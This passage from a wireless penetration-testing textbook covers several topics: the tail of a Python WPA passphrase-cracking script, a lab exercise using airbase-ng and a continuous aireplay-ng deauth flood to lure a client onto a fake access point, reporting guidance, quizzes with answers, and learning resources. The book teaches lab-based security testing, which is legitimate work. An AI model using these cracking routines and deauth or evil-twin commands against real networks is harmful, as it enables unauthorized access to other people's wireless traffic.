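    HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1 truncated to 128 bits."""
    version = int.from_bytes(eapol_frame[5:7], "big") & 0x7
    digestmod = hashlib.md5 if version == 1 else hashlib.sha1
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(MIC_LEN) + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, digestmod).digest()[:MIC_LEN]


def build_handshake(ssid, passphrase, key_version=1):
    """Constructed message 2 of the 4-way handshake (client -> AP), MIC'd with
    the real passphrase; it plays the role of the capture file."""
    key_info = (0x0100 | 0x0008 | key_version).to_bytes(2, "big")  # MIC | pairwise | version
    body = (bytes([0xFE if key_version == 1 else 0x02])  # descriptor type: WPA / RSN
            + key_info + bytes(2) + (1).to_bytes(8, "big")  # key length, replay counter
            + SNONCE + bytes(16) + bytes(8) + bytes(8)    # nonce, IV, RSC, ID
            + bytes(MIC_LEN) + bytes(2))                  # MIC placeholder, key data length
    frame = bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body  # EAPOL v1, EAPOL-Key
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    mic = eapol_mic(ptk[:16], frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]
    return {"ssid": ssid, "ap_mac": AP_MAC, "client_mac": CLIENT_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": frame}


def check_passphrase(candidate, hs):
    """The test aircrack-ng runs for every word: does this passphrase
    reproduce the MIC the client sent?"""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    ptk = derive_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]),
                               hs["eapol"][MIC_OFFSET:MIC_OFFSET + MIC_LEN])


def crack(wordlist, hs):
    """Return the first passphrase in wordlist that validates, else None."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if check_passphrase(word, hs):
            return word
    return None


if __name__ == "__main__":
    assert self_test()
    handshake = build_handshake("Wireless Lab", "12345678")
    words = ["password", "letmein", "qwerty", "12345678"]  # constructed wordlist
    print("KEY FOUND!", crack(words, handshake))
```

On a real capture the two MACs, the nonces and the client's EAPOL-Key frame are read out of the .cap file (aircrack-ng does that itself); the check is otherwise identical. Nothing in it depends on the access point, which is why the attack is offline and why the only defence is a passphrase that appears in no wordlist.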





Compromising clients

In this section, we will explore if we can force a client to associate with us. This will open up further opportunities to compromise the client's security.

Time for action - compromising the clients

Follow the given instructions to get started:

1. Let us revisit the client section of the airodump-ng screenshot. The Probes column shows which networks each client is looking for:

 BSSID              STATION            Packets  Probes
 (not associated)   C8:BC:C8:EE:12:0B        5  vivek
 (not associated)   00:14:45:AC:42:..        1
 (not associated)   00:22:7F:28:23:..        2  Mesh-320833000058-12
 00:21:91:D2:8E:25  00:22:FB:35:FC:44       15  Vivek
 00:21:91:D2:8E:25  60:FB:42:D5:E4:01       39  Wireless Lab,Vivek
 00:1E:40:53:02:FC  70:F1:A1:84:29:1A        7
 40:4A:03:AB:EB:E2  78:E4:00:51:98:..
 00:22:7F:25:0A:99  00:24:2B:64:DF:..
 AC:67:06:32:AC:99  00:21:5C:81:B9:..

2. We see that the authorized client 60:FB:42:D5:E4:01 has two networks in its preferred network list: Wireless Lab and Vivek. Let us first create an access point Vivek using airbase-ng. By default airbase-ng brings up an open access point, which is all that is needed here because the client treats Vivek as an open network (it associates unencrypted in step 4):

root@bt:~# airbase-ng --essid Vivek mon0

14:42:39 Created tap interface at0
14:42:39 Trying to set MTU on at0 to 1500
14:42:39 Access Point with BSSID 00:C0:CA:3E:BD:93 started.
3. Let us now disconnect the client forcefully from Wireless Lab by continuously sending de-authentication messages:

root@bt:~# aireplay-ng --deauth 0 -a 00:21:91:D2:8E:25 mon0

14:43:12 Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
4. The client now searches for available access points and connects to Vivek:

root@bt:~# airbase-ng --essid Vivek mon0

14:42:39 Created tap interface at0
14:42:39 Trying to set MTU on at0 to 1500
14:42:39 Access Point with BSSID 00:C0:CA:3E:BD:93 started.
14:43:32 Client 60:FB:42:D5:E4:01 associated (unencrypted) to ESSID: "Vivek"
What just happened?

We used the preferred network list of the client and created a honeypot access point with the same SSID. We then forcibly disconnected the client from the authorized access point. The client started searching for all available access points, found Vivek to be available in the vicinity, and connected to it. That access point is controlled by us, so every packet the client now sends arrives on the at0 interface of our machine, where it can be read or answered.





Reporting

Now that we have found all these security vulnerabilities, we need to report them to the enterprise. Every penetration testing company would have its own report structure. However, it must at least contain the following details:

• Vulnerability description
• Severity
• Affected devices
• Vulnerability type: software / hardware / configuration
• Workarounds
• Remediation

The preceding structure would give enough information to a network or security administrator to find and fix the vuln erability. At this point the penetration tester can only provide support to the administrator to help him understand the vulnerabilities, and perhaps propose best practices to secure his network.





Pop quiz — Wireless Penetration Testing

1. We can detect a rogue access point using?

 a. IP addresses
 b. MAC addresses
 c. Both a and b
 d. None of the above

2. Client mis-association can be prevented by

 a. Requiring user intervention before connecting to an access point
 b. Only keeping authorized networks in the preferred network list
 c. Using WPA2
 d. Not using WEP

3. In the Reporting phase, which do you think decides the importance of the vulnerability?

 a. Description
 b. Severity
 c. Affected devices
 d. Both (b) and (c)

4. In client attacks, which option in airbase-ng allows us to reply to all probing clients?

 a. -a
 b. --essid
 c. -P
 d. -C

Summary

In this chapter, we have learned how to conduct a wireless penetration test using BackTrack. 
Depending on the size of the network, the actual complexity and time taken could be quite 
large. We have taken a small network to illustrate the various phases and techniques you 
would use to run a penetration test. 
"I do not know what I may appear to the world; but to myself I seem to have been only like a boy playing on the seashore, and diverting myself in now and then finding a smoother pebble or a prettier shell than ordinary, whilst the great ocean of truth lay all undiscovered before me."

Sir Isaac Newton


Though we have reached the end of the book, we must always be eager to 
learn more and remain a student forever! 


We've finally come to the end of this book but hopefully, this is just the beginning of your 
journey in Wi-Fi security. In this chapter, we will explore the next steps in your learning path 
as a wireless penetration tester. 


It's been an exciting journey in the last 10 chapters! We started with setting up a basic lab 
for Wi-Fi and ended with conducting attacks on PEAP and WPA-Enterprise. We've definitely 
come a long way. 


However, the journey has not ended yet, and honestly may never end. Wi-Fi security is 

a constantly evolving field and new attacks, tools, and techniques are being discovered, 
disclosed, and released every month. It is important to stay informed and updated in order 
to be a good penetration tester. 


In this chapter, we will look at how to set up a more advanced lab, and we will touch upon 
various resources you can use to stay in touch with the latest happenings in this field. 


Conclusion and Road Ahead 


The lab we have created for this book is a barebones one and is great to get you started in 
the world of wireless security. However, you would require a more advanced lab, if you plan 
to pursue a career in Wi-Fi security and penetration testing. 


Here are a couple of additional items you could consider purchasing: 
Directional Antennas: 


Directional Antennas could be used to boost the signal and help detect more Wi-Fi networks 
from afar. This can come in handy when the penetration test involves a large facility, which 
might be difficult to cover by foot. 


There are different types of antennas suited for various purposes. It might be worthwhile to 
do some research on this topic before making a purchase. 





Wi-Fi Access Points:

It may be interesting to experiment with different access points using 802.11 a/b/g/n, and so on, as one can never really be sure what one may find in the field. Though, fundamentally, from an auditing perspective the techniques remain the same, in some rare cases the manufacturers may have added their own security patches to combat known issues. It is good to have experience with a varied set of access points.
Wi-Fi Cards:

We have used the Alfa card for our lab sessions throughout this book. There are other USB-based cards, and the cards built into laptops, which could also be used for wireless penetration testing with the right drivers. It might be a good idea to explore some of these cards and drivers. This will come in handy when the Alfa card fails and you have to fall back to the built-in or another card.
Smartphones and other Wi-Fi enabled devices: 


In today's world, laptops are not the only Wi-Fi enabled devices. Almost every mobile 
device has Wi-Fi included in it—Smartphones, tablets, and so on. It might be a good idea to 
purchase a variety of these devices and use them in the labs: 
Staying up-to-date

Security is a very fast-advancing field, and you will find that if you are out of touch for even a short period of a couple of months, part of your knowledge may become obsolete. In order to stay up-to-date, we recommend using the following avenues:

Mailing Lists:

http://www.securityfocus.com/ hosts multiple mailing lists, which are focused discussion groups for technical discussions. Among others, we would recommend subscribing to wifisec@securityfocus.com to stay in touch with the latest updates in the field.

Websites:

The Aircrack-ng site is the best resource to stay updated on new tools in this suite. Created by Thomas d'Otreppe, a.k.a. Mister X, this is probably the best tool out there for WLAN hacking:

http://www.aircrack-ng.org


Appendix A 


Among my personal favorites is Raul Siles' website, which contains a detailed list of tools, papers, research articles, conference materials, and much more, all dedicated to wireless security:

http://www.raulsiles.com/resources/wifi.html

Joshua Wright's blog, though not very regularly updated, is the definitive place for the latest on WPA-Enterprise attacks:

http://www.willhackforsushi.com/

Conferences:

Hacker and security conferences such as Defcon and Black Hat have excellent talks and workshops each year on various topics in security, including wireless security. Most of these talk videos and course materials are released free of charge online. It would be good to follow these conferences:

• Defcon: http://www.defcon.org
• Blackhat: http://www.blackhat.com

BackTrack-related:

BackTrack as a platform is evolving constantly. It's important to ensure that your copy is always the latest and greatest! The following websites are the first place for any release announcements:

• BackTrack website: http://www.backtrack-linux.org
• Offensive Security: http://www.offensive-security.com

Conclusion

We hope you enjoyed this book and the different exercises in it. By now you should be able to conduct penetration tests on wireless networks with ease using BackTrack. Our final advice to you would be to always be a student and keep learning! This is what will keep you sharper than the rest of the competition.

We wish you all the best for a career in wireless penetration testing!
Chapter 1, Wireless Lab Setup

1) Run the command ifconfig wlan0. In the output, you should see the flag "UP"; this indicates that the card is functional.

2) You will only need a hard drive if you would like to store anything across reboots, like configuration settings or scripts.

3) It shows the ARP table on the local machine.

4) We would use WPA Supplicant.





Chapter 2, WLAN and its Inherent Insecurities

1) b) Management frames with sub-type authentication are responsible for WLAN authentication.

2) b) The naming starts from mon0 and goes up to monX, so the second interface will be mon1.

3) a) To do this we will have to use the option which is the complement of the filter for selecting all Beacon frames.





Pop Quiz Answers 


Chapter 3, Bypassing WLAN Authentication

1) d) All of the above will have the same effect, as the client would connect back.

2) b) Open Authentication provides no security at all.

3) a) We derive the keystream from the packets and re-use it for responding to the next challenge.

Chapter 4, WLAN Encryption Flaws

1) c) Encrypted ARP packets are used for a replay attack.

2) a) WEP can always be broken, no matter what key is used or which access point is running it.

3) b) WPA-PSK can be cracked only if a weak passphrase, one which can appear in a dictionary, is chosen.


Chapter 5, Attacks on the WLAN Infrastructure

1) a) Rogue APs typically do not use any encryption.

2) a) If two access points have the same MAC address and SSID, differentiating them is a difficult task.

3) a) Typically a DoS attack brings down the network and makes it unusable.

4) a) Rogue APs allow for a backdoor entry into the authorized network.

Chapter 6, Attacking the Client

1) b) The Caffe Latte attack can help recover the WEP key from the client.

2) a) Honeypots will typically use no encryption and open authentication so that clients can connect to them easily.

4) b) Caffe Latte can only recover the key if the client has the WEP key for the authorized network cached and stored on it.

Chapter 7, Advanced WLAN Attacks

1) b) In all man-in-the-middle attacks, it's always the attacker who is in the middle.

2) b) Dnsspoof spoofs DNS responses to hijack sessions.

3) c) The SSID does not have any role to play in MITMs.

4) a) at0 is the wired side of the software-based access point created by airbase-ng.

Chapter 8, Attacking WPA-Enterprise and RADIUS

1) b) FreeRadius-WPE is a patch written by Joshua Wright to the original FreeRadius server.

2) b) PEAP can be attacked by having a gullible client accept the fake server-side certificate provided by the attacker.

3) d) EAP-TLS uses both client and server-side certificates.

4) b) EAP-TTLS uses server-side certificates.







Chapter 9, WLAN Penetration Testing Methodology

1) d) It is non-trivial to detect rogue access points, and using simple bindings like IP and MAC will not work in most cases.

2) a) If the user has to approve every access point before connecting to it, then most mis-association attacks could be prevented.

3) d) A severe defect in an important device on the network would be the most important vulnerability to fix.

4) c) The -P option makes airbase-ng respond to all probes.